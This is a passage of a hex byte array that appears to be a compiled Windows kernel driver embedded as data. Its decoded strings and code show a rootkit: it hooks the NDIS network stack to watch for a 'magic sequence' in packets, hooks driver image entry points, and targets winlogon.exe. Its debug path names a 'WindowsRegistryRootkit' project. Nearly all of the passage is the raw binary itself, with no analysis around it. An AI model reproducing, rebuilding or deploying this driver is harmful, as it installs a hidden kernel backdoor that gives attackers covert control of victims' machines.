4f,0x52,\r\n0x3a,0x20,0x55,0x6e,0x6b,0x6e,0x6f,0x77,0x6e,0x20,0x4e,0x54,0x20,0x76,0x65,0x72,\r\n0x73,0x69,0x6f,0x6e,0x0a,0x00,0x00,0x00,0x4e,0x74,0x50,0x72,0x6f,0x74,0x65,0x63,\r\n0x74,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x28,0x29,\r\n0x20,0x53,0x44,0x54,0x20,0x6e,0x75,0x6d,0x62,0x65,0x72,0x20,0x69,0x73,0x20,0x30,\r\n0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,\r\n0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,\r\n0x4f,0x52,0x3a,0x20,0x4e,0x44,0x49,0x53,0x20,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e,\r\n0x20,0x30,0x78,0x25,0x78,0x20,0x69,0x73,0x20,0x6e,0x6f,0x74,0x20,0x73,0x75,0x70,\r\n0x70,0x6f,0x72,0x74,0x65,0x64,0x0a,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,\r\n0x54,0x00,0x43,0x00,0x50,0x00,0x49,0x00,0x50,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,\r\n0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x22,0x54,0x43,0x50,0x49,\r\n0x50,0x22,0x20,0x70,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x20,0x61,0x64,0x64,0x72,\r\n0x65,0x73,0x73,0x20,0x69,0x73,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,\r\n0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x4f,\r\n0x70,0x65,0x6e,0x20,0x62,0x6c,0x6f,0x63,0x6b,0x20,0x3d,0x20,0x30,0x78,0x25,0x2e,\r\n0x38,0x78,0x2c,0x20,0x4d,0x69,0x6e,0x69,0x70,0x6f,0x72,0x74,0x20,0x3d,0x20,0x30,\r\n0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,\r\n0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x48,0x6f,0x6f,0x6b,0x69,0x6e,0x67,0x20,0x4d,\r\n0x69,0x6e,0x69,0x70,0x6f,0x72,0x74,0x44,0x70,0x63,0x3a,0x20,0x30,0x78,0x25,0x2e,\r\n0x38,0x78,0x20,0x2d,0x3e,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,\r\n0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x20,0x45,0x52,\r\n0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,0x20,0x66,\r\n0x69,0x6e,0x64,0x20,0x22,0x54,0x43,0x50,0x49,0x50,0x22,0x20,0x70,0x72,0x6f,0x74,\r\n0x6f,0x63,0x6f,0x6c,0x0a,0x00,0x00,0x00,0x25,0x64,0x2e,0x25,0x64,0x2e,0x25,0x64,\r\n0x2e,0x25,0x64,0x00,0x00,0x00,0x00,0x00,0x77,0x00,0x69,0x00,0x6e,0x00,0x6c,0x00,\r\n0x6f,0x00,0x67,0x00,0x6f,0x00,0x6e,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,\r\n0x48,0x61,0x6e,0x64,0x6c,0x65,0x42,0x75,0x66,0x66,0x65,0x72,0x28,0x29,0x20,0x49,\r\n0x50,0x3a,0x20,0x46,0x72,0x6f,0x6d,0x20,0x3d,0x20,0x25,0x73,0x2c,0x20,0x54,0x6f,\r\n0x20,0x3d,0x20,0x25,0x73,0x2c,0x20,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x20,\r\n0x3d,0x20,0x25,0x64,0x2c,0x20,0x4c,0x65,0x6e,0x67,0x74,0x68,0x20,0x3d,0x20,0x25,\r\n0x64,0x0a,0x00,0x00,0x52,0x4b,0x43,0x54,0x4c,0x3a,0x37,0x43,0x35,0x45,0x33,0x33,\r\n0x38,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,\r\n0x48,0x61,0x6e,0x64,0x6c,0x65,0x42,0x75,0x66,0x66,0x65,0x72,0x28,0x29,0x3a,0x20,\r\n0x4d,0x61,0x67,0x69,0x63,0x20,0x73,0x65,0x71,0x75,0x65,0x6e,0x63,0x65,0x20,0x68,\r\n0x61,0x73,0x20,0x62,0x65,0x65,0x6e,0x20,0x66,0x69,0x6e,0x64,0x20,0x69,0x6e,0x20,\r\n0x6e,0x65,0x74,0x77,0x6f,0x72,0x6b,0x20,0x70,0x61,0x63,0x6b,0x65,0x74,0x21,0x0a,\r\n0x00,0x00,0x00,0x00,0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,\r\n0x65,0x6d,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,\r\n0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x44,0x72,0x69,0x76,\r\n0x65,0x72,0x45,0x6e,0x74,0x72,0x79,0x43,0x6f,0x6e,0x74,0x69,0x6e,0x75,0x65,0x54,\r\n0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x50,0x61,0x72,0x61,0x6d,0x20,0x3d,\r\n0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x45,0x78,0x41,0x6c,\r\n0x6c,0x6f,0x63,0x61,0x74,0x65,0x50,0x6f,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69,\r\n0x6c,0x73,0x0a,0x00,0x4e,0x65,0x77,0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74,\r\n0x72,0x79,0x28,0x29,0x3a,0x20,0x48,0x6f,0x6f,0x6b,0x65,0x64,0x20,0x64,0x72,0x69,\r\n0x76,0x65,0x72,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x73,0x20,0x30,0x78,0x25,0x2e,\r\n0x38,0x78,0x0a,0x00,0x4e,0x65,0x77,0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74,\r\n0x72,0x79,0x28,0x29,0x3a,0x20,0x53,0x74,0x61,0x72,0x74,0x20,0x61,0x64,0x64,0x72,\r\n0x65,0x73,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,\r\n0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,0x65,0x6d,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3a,0x20,0x30,0x78,\r\n0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x48,0x6f,0x6f,0x6b,0x49,0x6d,0x61,0x67,\r\n0x65,0x45,0x6e,0x74,0x72,0x79,0x28,0x29,0x3a,0x20,0x49,0x6d,0x61,0x67,0x65,0x20,\r\n0x65,0x6e,0x74,0x72,0x79,0x20,0x70,0x6f,0x69,0x6e,0x74,0x20,0x68,0x6f,0x6f,0x6b,\r\n0x65,0x64,0x20,0x28,0x30,0x78,0x25,0x2e,0x38,0x78,0x20,0x2d,0x3e,0x20,0x30,0x78,\r\n0x25,0x2e,0x38,0x78,0x29,0x0a,0x00,0x00,0x49,0x4e,0x49,0x54,0x00,0x00,0x00,0x00,\r\n0x25,0x64,0x20,0x66,0x72,0x65,0x65,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x61,0x74,\r\n0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x5c,0x00,0x48,0x00,\r\n0x54,0x00,0x54,0x00,0x50,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,\r\n0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x2e,0x00,\r\n0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,\r\n0x73,0x00,0x6d,0x00,0x62,0x00,0x31,0x00,0x30,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,\r\n0x73,0x00,0x00,0x00,0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,0x73,0x00,0x6d,0x00,\r\n0x62,0x00,0x32,0x00,0x30,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,\r\n0x5c,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,\r\n0x00,0x00,0x00,0x00,0x5c,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x32,0x00,0x2e,0x00,\r\n0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,0x5c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,\r\n0x64,0x00,0x72,0x00,0x76,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,\r\n0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x28,\r\n0x29,0x3a,0x20,0x27,0x25,0x77,0x5a,0x27,0x20,0x69,0x73,0x20,0x61,0x74,0x20,0x30,\r\n0x78,0x25,0x2e,0x38,0x78,0x2c,0x20,0x73,0x69,0x7a,0x65,0x3d,0x25,0x64,0x0a,0x00,\r\n0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74,0x72,0x79,0x28,0x29,0x3a,0x20,0x4c,\r\n0x6f,0x61,0x64,0x65,0x64,0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,\r\n0x00,0x00,0x00,0x00,0x52,0x6f,0x6f,0x74,0x6b,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,\r\n0x3a,0x20,0x30,0x78,0x25,0x78,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x66,0x72,0x6f,\r\n0x6d,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x50,0x73,0x53,0x65,\r\n0x74,0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,\r\n0x52,0x6f,0x75,0x74,0x69,0x6e,0x65,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3a,\r\n0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x45,0x78,0x41,0x6c,\r\n0x6c,0x6f,0x63,0x61,0x74,0x65,0x50,0x6f,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69,\r\n0x6c,0x73,0x0a,0x00,0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x53,0x79,0x73,0x74,0x65,\r\n0x6d,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,0x28,0x29,0x20,0x66,\r\n0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,\r\n0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x2e,0x00,\r\n0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6f,0x00,0x73,0x00,\r\n0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,\r\n0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,\r\n0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x61,0x00,0x63,0x00,0x70,0x00,\r\n0x69,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,\r\n0x6c,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x63,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,\r\n0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x6d,0x00,0x70,0x00,0x73,0x00,\r\n0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,\r\n0x6c,0x00,0x61,0x00,0x61,0x00,0x63,0x00,0x70,0x00,0x69,0x00,0x2e,0x00,0x64,0x00,\r\n0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x6d,0x00,\r\n0x61,0x00,0x63,0x00,0x70,0x00,0x69,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,\r\n0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6f,0x00,0x73,0x00,0x6b,0x00,0x72,0x00,\r\n0x6e,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,\r\n0x6e,0x00,0x74,0x00,0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x70,0x00,0x61,0x00,\r\n0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,\r\n0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x6d,0x00,0x70,0x00,0x2e,0x00,0x65,0x00,\r\n0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6b,0x00,0x72,0x00,\r\n0x70,0x00,0x61,0x00,0x6d,0x00,0x70,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,\r\n0x00,0x00,0x00,0x00,0x6e,0x74,0x6f,0x73,0x6b,0x72,0x6e,0x6c,0x2e,0x65,0x78,0x65,\r\n0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69,\r\n0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x3a,0x20,0x4b,0x65,0x72,0x6e,0x65,0x6c,0x20,\r\n0x62,0x61,0x73,0x65,0x20,0x69,0x73,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,\r\n0x6e,0x64,0x69,0x73,0x2e,0x73,0x79,0x73,0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,\r\n0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x3a,\r\n0x20,0x4e,0x44,0x49,0x53,0x20,0x62,0x61,0x73,0x65,0x20,0x69,0x73,0x20,0x30,0x78,\r\n0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x6e,0x64,0x69,0x73,0x2e,0x73,0x79,0x73,\r\n0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69,\r\n0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55,\r\n0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,0x20,0x6c,0x6f,0x63,0x61,0x74,0x65,0x20,\r\n0x4e,0x44,0x49,0x53,0x0a,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xc0,0x2d,0x00,0x10,0x20,0x0f,0x00,0x10,0x01,0x00,0x00,0x00,\r\n0x52,0x53,0x44,0x53,0x30,0xf9,0x23,0x4b,0x06,0x74,0x2c,0x46,0x98,0xa0,0x13,0x7b,\r\n0x60,0xd0,0x84,0xd2,0x03,0x00,0x00,0x00,0x78,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f,\r\n0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c,\r\n0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52,\r\n0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x72,0x6f,0x6f,0x74,0x6b,\r\n0x69,0x74,0x5f,0x64,0x72,0x69,0x76,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,\r\n0x70,0x64,0x62,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x2a,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x14,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x1c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x7c,0x83,0x3d,0xc8,0x2d,0x00,0x10,0x00,0x74,0x0a,0xa1,\r\n0xc8,0x2d,0x00,0x10,0xe9,0xd8,0x00,0x00,0x00,0xc7,0x45,0x84,0x00,0x00,0x00,0x00,\r\n0x6a,0x6c,0x6a,0x00,0x8d,0x45,0x90,0x50,0xe8,0x81,0x1b,0x00,0x00,0x83,0xc4,0x0c,\r\n0xc6,0x45,0x90,0x05,0xc6,0x45,0x91,0x00,0xc7,0x45,0x98,0x40,0x0f,0x00,0x10,0xc7,\r\n0x45,0x9c,0x70,0x0f,0x00,0x10,0xc7,0x45,0xa0,0xc0,0x0f,0x00,0x10,0xc7,0x45,0xa4,\r\n0xd0,0x0f,0x00,0x10,0xc7,0x45,0xa8,0x80,0x0f,0x00,0x10,0xc7,0x45,0xac,0x90,0x0f,\r\n0x00,0x10,0xc7,0x45,0xb0,0xe0,0x0f,0x00,0x10,0xc7,0x45,0xb4,0xf0,0x0f,0x00,0x10,\r\n0xc7,0x45,0xb8,0xa0,0x0f,0x00,0x10,0xc7,0x45,0xbc,0xb0,0x0f,0x00,0x10,0xc7,0x45,\r\n0xcc,0x30,0x0f,0x00,0x10,0xc7,0x45,0xd0,0x50,0x0f,0x00,0x10,0xc7,0x45,0xd8,0x60,\r\n0x0f,0x00,0x10,0xc7,0x45,0xc8,0x00,0x10,0x00,0x10,0xc7,0x45,0xd4,0x10,0x10,0x00,\r\n0x10,0x68,0x9c,0x03,0x00,0x10,0x8d,0x4d,0x88,0x51,0xff,0x15,0x20,0x03,0x00,0x10,\r\n0x8b,0x55,0x88,0x89,0x55,0xc0,0x8b,0x45,0x8c,0x89,0x45,0xc4,0x6a,0x6c,0x8d,0x4d,\r\n0x90,0x51,0x68,0xc8,0x2d,0x00,0x10,0x8d,0x55,0x84,0x52,0xff,0x15,0x84,0x02,0x00,\r\n0x10,0x83,0x7d,0x84,0x00,0x74,0x15,0x8b,0x45,0x84,0x50,0x68,0xb4,0x03,0x00,0x10,\r\n0xe8,0xbd,0x1a,0x00,0x00,0x83,0xc4,0x08,0x33,0xc0,0xeb,0x05,0xa1,0xc8,0x2d,0x00,\r\n0x10,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x83,0x3d,0xc8,0x2d,0x00,0x10,0x00,0x74,0x21,0xc7,0x45,0xfc,\r\n0x00,0x00,0x00,0x00,0xa1,0xc8,0x2d,0x00,0x10,0x50,0x8d,0x4d,0xfc,0x51,0xff,0x15,\r\n0x80,0x02,0x00,0x10,0xc7,0x05,0xc8,0x2d,0x00,0x10,0x00,0x00,0x00,0x00,0x8b,0xe5,\r\n0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0x60,0xe8,0x00,0x00,0x00,0x00,0x5b,0x81,0xeb,0x8c,\r\n0x11,0x00,0x10,0xe8,0x6f,0x00,0x00,0x00,0x8b,0xf0,0x68,0xe8,0x60,0xbf,0x04,0x56,\r\n0xe8,0x84,0x00,0x00,0x00,0x6a,0x00,0x6a,0x00,0x8d,0x8b,0x3e,0x13,0x00,0x10,0x51,\r\n0xff,0xd0,0x8b,0xf0,0x68,0x89,0xfd,0x12,0xa4,0x56,0xe8,0x6a,0x00,0x00,0x00,0x89,\r\n0x45,0xfc,0x68,0x84,0x9b,0x50,0xf2,0x56,0xe8,0x5c,0x00,0x00,0x00,0x89,0x45,0xf4,\r\n0xff,0x75,0xf4,0xff,0x75,0xfc,0x8b,0x45,0x08,0x50,0xe8,0xa3,0x00,0x00,0x00,0x89,\r\n0x45,0xf8,0x61,0x8b,0x45,0xf8,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0x55,0x8b,0xec,0x8b,\r\n0x45,0x08,0x52,0x33,0xd2,0xc1,0xc2,0x03,0x32,0x10,0x40,0x80,0x38,0x00,0x75,0xf5,\r\n0x8b,0xc2,0x5a,0x5d,0xc2,0x04,0x00,0x56,0x33,0xc0,0x64,0xa1,0x30,0x00,0x00,0x00,\r\n0x78,0x0c,0x8b,0x40,0x0c,0x8b,0x70,0x1c,0xad,0x8b,0x40,0x08,0xeb,0x09,0x8b,0x40,\r\n0x34,0x8d,0x40,0x7c,0x8b,0x40,0x3c,0x5e,0xc3,0x55,0x8b,0xec,0x53,0x56,0x57,0x33,\r\n0xc0,0x8b,0x5d,0x0c,0x8b,0x75,0x08,0x8b,0xfe,0x03,0x76,0x3c,0x8b,0x4e,0x78,0x03,\r\n0xcf,0x8b,0x51,0x1c,0x52,0x8b,0x51,0x24,0x52,0x8b,0x71,0x20,0x03,0xf7,0x99,0x4a,\r\n0xad,0x42,0x03,0x45,0x08,0x50,0xe8,0x91,0xff,0xff,0xff,0x3b,0xc3,0x75,0xf1,0x8b,\r\n0x45,0x08,0x92,0x5e,0x03,0xf2,0xd1,0xe0,0x03,0xc6,0x33,0xc9,0x0f,0xb7,0x08,0x5f,\r\n0xc1,0xe1,0x02,0x03,0xca,0x03,0xcf,0x8b,0x01,0x03,0xc2,0x5f,0x5e,0x5b,0x5d,0xc2,\r\n0x08,0x00,0x55,0x8b,0xec,0x83,0xec,0x10,0x53,0x8b,0x5d,0x08,0x85,0xdb,0x56,0x57,\r\n0x0f,0x84,0xa4,0x00,0x00,0x00,0x8b,0x43,0x3c,0x8b,0xbc,0x18,0x80,0x00,0x00,0x00,\r\n0x03,0xfb,0xe9,0x80,0x00,0x00,0x00,0x8b,0x47,0x0c,0x03,0xc3,0x89,0x45,0xfc,0xff,\r\n0x75,0xfc,0xff,0x55,0x0c,0x89,0x45,0x08,0x83,0x7d,0x08,0x00,0x74,0x7c,0x83,0x7f,\r\n0x04,0xff,0x75,0x04,0x8b,0x07,0xeb,0x03,0x8b,0x47,0x10,0x89,0x45,0xfc,0x8d,0x34,\r\n0x18,0xeb,0x4c,0x8b,0x06,0xa9,0x00,0x00,0x00,0xf0,0x74,0x19,0x25,0xff,0xff,0x00,\r\n0x00,0x89,0x45,0xf8,0xff,0x75,0xf8,0xff,0x75,0x08,0xff,0x55,0x10,0x89,0x45,0xf4,\r\n0x8b,0x45,0xf4,0xeb,0x16,0x8d,0x44,0x18,0x02,0x89,0x45,0xf8,0xff,0x75,0xf8,0xff,\r\n0x75,0x08,0xff,0x55,0x10,0x89,0x45,0xf0,0x8b,0x45,0xf0,0x85,0xc0,0x89,0x06,0x74,\r\n0x29,0x8b,0x47,0x10,0x2b,0x45,0xfc,0x8b,0x0e,0x89,0x0c,0x30,0x83,0xc6,0x04,0x83,\r\n0x3e,0x00,0x75,0xaf,0x83,0xc7,0x14,0x83,0x3f,0x00,0x0f,0x85,0x77,0xff,0xff,0xff,\r\n0x33,0xc0,0x40,0x5f,0x5e,0x5b,0xc9,0xc2,0x0c,0x00,0x33,0xc0,0xeb,0xf5,0x6b,0x65,\r\n0x72,0x6e,0x65,0x6c,0x33,0x32,0x00,0x7e,0x45,0x4e,0x44,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x83,0x3d,0xdc,0x2d,0x00,0x10,0x00,0x74,0x0e,0xa1,0xdc,0x2d,0x00,0x10,0x8d,0x54,\r\n0x24,0x04,0xcd,0x2e,0xc2,0x14,0x00,0xb8,0x01,0x00,0x00,0x00,0xc2,0x14,0x00,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x45,0x08,\r\n0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x81,0x39,0x7e,0x45,0x4e,0x44,0x74,0x14,0x8b,0x55,\r\n0xfc,0x83,0xc2,0x01,0x89,0x55,0xfc,0x8b,0x45,0xf8,0x83,0xc0,0x01,0x89,0x45,0xf8,\r\n0xeb,0xe1,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x68,0xe4,0x03,0x00,0x10,0xe8,0x25,0x18,0x00,0x00,0x83,0xc4,0x04,\r\n0x6a,0x00,0x6a,0x00,0x68,0xcc,0x2d,0x00,0x10,0xff,0x15,0xd4,0x02,0x00,0x10,0x5d,\r\n0xc2,0x14,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x18,0xc6,0x45,0xf7,0x00,0x83,0x7d,0x08,0x00,0x74,0x0e,\r\n0x8b,0x45,0x08,0x50,0x8d,0x4d,0xf8,0x51,0xff,0x15,0x20,0x03,0x00,0x10,0x8b,0x55,\r\n0x10,0xc7,0x02,0x00,0x00,0x00,0x00,0x8b,0x45,0x14,0xc7,0x00,0x00,0x00,0x00,0x00,\r